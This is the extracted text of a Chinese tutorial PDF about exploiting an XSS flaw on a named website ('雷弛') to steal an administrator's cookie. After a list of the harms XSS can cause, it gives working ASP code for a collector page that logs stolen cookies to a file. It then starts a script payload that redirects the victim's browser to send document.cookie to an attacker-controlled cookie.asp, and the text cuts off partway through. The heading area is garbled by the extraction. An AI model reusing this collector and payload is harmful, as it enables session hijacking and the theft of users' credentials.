利用雷弛网站XSS漏洞获取管理员cookie.pdfVIP

计 算 机 机 计 机 计 网 计 网 技 网 技 安 技 算 安 算 安 算 络 络 术 络 术 全 术 全 全 利用雷弛网站XSS 漏洞获取管理员cookie 利用雷弛网站XSS漏洞获取管理员cookie XSS 漏洞的危害有 （包括但不限于）： 壹 窃取用户信息，如cookies 资料、浏览历史、真实IP 、开放端口等； 贰 劫持用户 （浏览器）会话，从而执行任意操作，例如进行非法转 账、强制发表日志、发送电子邮件等； 任意篡改页面信息，即使存在XSS 漏洞的页面不具备任何输入框， 叁 黑客还可以通过修改DOM ，伪造一个登录框，来诱导用户在本不 需要登录的页面，去输入自己的用户名和密码。 控制受害者机器向其它网站发起访问，如弹出广告页面、帮某个 肆 网站刷流量、或者DDoS 攻击了解了XSS 漏洞的知识以后，下面我 们通过一个实验案例，来验证XSS 的可能造成的危害。 一、实验案例：利用雷弛网站XSS漏洞获取cookie 1.接收cookie 的程序 建立一个自己网站 （以asp 环境为例），接收发送过来的cookie ，并将获 取的信息保存在一个文件里。 获取cookie代码 html titlexxs/title body % testfile = Server.MapPath(code.txt) // 获取网站根目录， 在根目录下创建一个code.txt路径，保存在testfile 一、实验案例：利用雷弛网站XSS漏洞获取cookie msg = Request(msg) // 获取提交过来的msg 变量值 set fs = server.CreateObject(scripting.filesystemobject)//创建一个文件对象 set thisfile = fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(msg)// 向code.txt 中写入获取来的cookie值 thisfile.close() // 关闭 set fs = nothing % /body /html 把上述文件保存为xxx.asp 文件，放到你自己的网站服务器下。 如：49/2.asp 一、实验案例：利用雷弛网站XSS漏洞获取cookie 2.获取cookie 的代码，并利用URL发送到另一台服务器上 攻击者可以使用下面三种方式获取客户端的Cookie信息，并发到另一台 服务器上。 script document.location=/cookie.asp?cookie=+document. cookie /script img